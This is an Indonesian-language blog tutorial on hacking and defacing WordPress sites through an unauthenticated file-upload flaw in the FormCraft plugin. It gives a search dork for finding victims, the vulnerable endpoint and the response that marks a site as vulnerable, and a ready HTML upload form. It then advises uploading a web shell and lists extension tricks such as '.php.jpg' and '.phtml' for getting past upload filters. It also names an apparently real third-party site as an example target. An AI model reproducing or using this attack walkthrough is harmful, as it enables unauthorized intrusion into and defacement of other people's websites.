Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0 - Sesuai dengan judul postingan, kali ini saya akan memberikan tutorial untuk melakukan hacking atau deface sebuah website.
Target kita kali ini adalah situs yang menggunakan CMS WordPress, dan kita akan memanfaatkan kelamahan dari plugin FromCraft yang terinstall di situs target.
Dork : inurl:"/wp-content/plugins/formcraft/"
Exploit : /wp-content/plugins/formcraft/file-upload/server/content/upload.php
Target yang vuln akan memunculkan tulisan seperi ini : {"failed":"No file found 2"}
Silahkan dorking dulu untuk mencari target. Dork bisa kalian kembangkan sendiri biar lebih mantap.
Berikut ini adalah salah satu contoh target yang vuln.
![]() |
http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php |
Setelah mendapatkan target yang vuln, selanjutnya kita akan menggunakan CSRF untuk mengupload file kita.
***CSRF***
<form method="POST" action="[Alamat_Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Kemudian, simpan kode CSRF yang telah saya berikan dalam format html, dan jangan lupa untuk mengganti [Alamat_Target] sesuai dengan alamat dari target kita.
![]() |
Untuk nama filenya terserah kamu, yang penting adalah format harus .html |
Setelah itu, buka file CSRF yang telah kita buat tadi menggunakan web browser.
Sekarang pilih file yang ingin kamu upload, dan tekan Upload.
Jika muncul tulisan seperti pada gambar dibawah ini, berarti file kita telah berhasil tersimpan di website target.
Perlu diperhatikan, bahwa nama file yang kita upload akan berubah setelah diproses oleh server.
Dalam kasus ini, file yang saya upload bernama "arter.html" kemudian berubah nama menjadi "15d9606bedf01e---arter.html".
Sekarang kita tinggal mengakses file yang telah diupload tadi.
Direktori file kita : target/wp-content/plugins/formcraft/file-upload/server/content/files/nama_filekamu
Dan hasilnya akan seperti ini:
![]() |
http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/files/15d9606bedf01e---arter.html |
Kalo kamu mau menebas index website, silahkan upload shell andalah kamu.
Jenis ekstensi yang didukung : namafile.html, namafile.php, namafile,jpg, namafile.gif.
Untuk upload shell, kamu bisa menyamarkannya dengan menggunakan namafile.php.jpg, namafile.php5, namafile.phtml, namafile.php;.gif, dan sebagainya. Silahkan gunakan otak kamu.
Btw, jika balasan dari website adalah {"failed":"Not writable"}, berarti bug di web itu telah diperbaiki.
Beberapa contoh target yang masih vuln:
Goodluck.